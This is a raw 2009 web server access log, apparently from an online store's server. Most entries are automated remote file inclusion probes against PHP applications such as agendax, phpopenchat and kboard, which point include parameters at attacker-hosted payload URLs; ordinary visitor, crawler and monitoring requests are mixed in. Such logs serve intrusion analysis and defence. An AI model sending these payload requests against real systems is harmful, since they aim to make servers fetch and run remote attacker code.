75.140.75.14 - - [16/Jul/2009:01:42:21 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:42:26 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L118C72443EC4F500B101000+WSEQ(S0020):2+OKEY(A0190):001372917000O0099755+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [16/Jul/2009:01:42:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.29.124 - - [16/Jul/2009:01:42:56 -0400] "GET /logs//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:42:56 -0400] "GET /logs/access_log.Q109061700//join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:42:56 -0400] "GET //join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:42:56 -0400] "GET /logs//join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:42:58 -0400] "GET /logs/access_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:42:58 -0400] "GET //contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
74.223.143.131 - - [16/Jul/2009:01:42:59 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:01:42:59 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.78.62.84 - - [16/Jul/2009:01:42:59 -0400] "GET /logs/access_log.Q109060400//join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
74.223.143.131 - - [16/Jul/2009:01:43:00 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:01:43:01 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:01:43:01 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:01:43:01 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.78.62.84 - - [16/Jul/2009:01:43:02 -0400] "GET /logs/access_log.Q109061700//join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:43:03 -0400] "GET //join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:43:03 -0400] "GET /logs//join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:43:03 -0400] "GET /logs/access_log.Q109060400//join.php?INCLUDE_FOLDER=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:04 -0400] "GET /logs//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
74.223.143.131 - - [16/Jul/2009:01:43:05 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.38.29.124 - - [16/Jul/2009:01:43:06 -0400] "GET //contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:06 -0400] "GET /logs/access_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
74.223.143.131 - - [16/Jul/2009:01:43:07 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:01:43:14 -0400] "GET /logs/access_log.Q109052800%20%20//include/footer.php?_path[counter]=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.38.29.124 - - [16/Jul/2009:01:43:26 -0400] "GET /logs/access_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:26 -0400] "GET /logs//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:26 -0400] "GET //contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:47 -0400] "GET /logs/error_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:57 -0400] "GET //contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:57 -0400] "GET /logs//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:43:57 -0400] "GET /logs/access_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:44:00 -0400] "GET /logs/error_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:44:24 -0400] "GET /logs/error_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
87.106.245.84 - - [16/Jul/2009:01:44:26 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.38.29.124 - - [16/Jul/2009:01:44:29 -0400] "GET /logs/error_log.Q109051500//contacts.php?cal_dir=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
87.106.245.84 - - [16/Jul/2009:01:44:34 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.38.29.124 - - [16/Jul/2009:01:45:36 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
74.223.143.131 - - [16/Jul/2009:01:45:37 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.38.29.124 - - [16/Jul/2009:01:45:39 -0400] "GET /phphtml.php?htmlclass_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
218.38.29.124 - - [16/Jul/2009:01:45:39 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
74.223.143.131 - - [16/Jul/2009:01:45:40 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:01:45:47 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:01:46:00 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:35 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:35 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:38 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:38 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:46 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:46 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:46 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:59 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:46:59 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:05 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:05 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:05 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:09 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:20 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:21 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:21 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:26 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:01:47:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [16/Jul/2009:01:47:48 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:48 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:47:48 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:48:26 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:48:26 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:48:26 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:48:26 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:48:38 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:48:56 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C784931E475008D11001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
190.144.44.36 - - [16/Jul/2009:01:48:57 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:48:57 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:48:57 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.38.29.124 - - [16/Jul/2009:01:49:05 -0400] "GET /logs/access_log.Q109062900/phphtml.php?htmlclass_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
75.140.75.14 - - [16/Jul/2009:01:49:25 -0400] "GET /CGI-BIN/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6000.16851)"
93.158.137.122 - - [16/Jul/2009:01:49:41 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; I)"
190.144.44.36 - - [16/Jul/2009:01:49:50 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:49:52 -0400] "GET /CGI-BIN/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 7.0.6000.16851)"
190.144.44.36 - - [16/Jul/2009:01:50:03 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:50:08 -0400] "GET /logs/access_log.Q109052300//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:50:22 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:01:50:26 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:01:50:26 -0400] "GET /logs/access_log.Q109061900/?_SERVER[DOCUMENT_ROOT]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:01:50:26 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
66.178.116.28 - - [16/Jul/2009:01:50:30 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:01:50:42 -0400] "GET /logs/access_log.Q109061900/?_SERVER[DOCUMENT_ROOT]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:01:50:42 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:01:50:42 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9726 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:51:16 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:01:51:17 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:51:48 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.178.116.28 - - [16/Jul/2009:01:52:32 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:01:52:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [16/Jul/2009:01:54:03 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.252.140.140 - - [16/Jul/2009:01:54:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
76.252.140.140 - - [16/Jul/2009:01:54:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
76.252.140.140 - - [16/Jul/2009:01:54:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
76.252.140.140 - - [16/Jul/2009:01:54:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
190.144.44.36 - - [16/Jul/2009:01:54:14 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [16/Jul/2009:01:54:32 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:54:37 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:54:37 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:54:39 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:54:39 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:54:43 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:54:43 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:54:44 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
190.144.44.36 - - [16/Jul/2009:01:55:33 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:55:33 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.172.23.28 - - [16/Jul/2009:01:55:56 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.68.247 - - [16/Jul/2009:01:57:00 -0400] "GET /images/home_welcome1.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [16/Jul/2009:01:57:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.163.252.93 - - [16/Jul/2009:01:57:40 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:57:40 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:57:40 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://cornect.com/wp-content/plugins/dm-albums/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:57:41 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:57:41 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.163.252.93 - - [16/Jul/2009:01:57:41 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.192 - - [16/Jul/2009:01:58:02 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
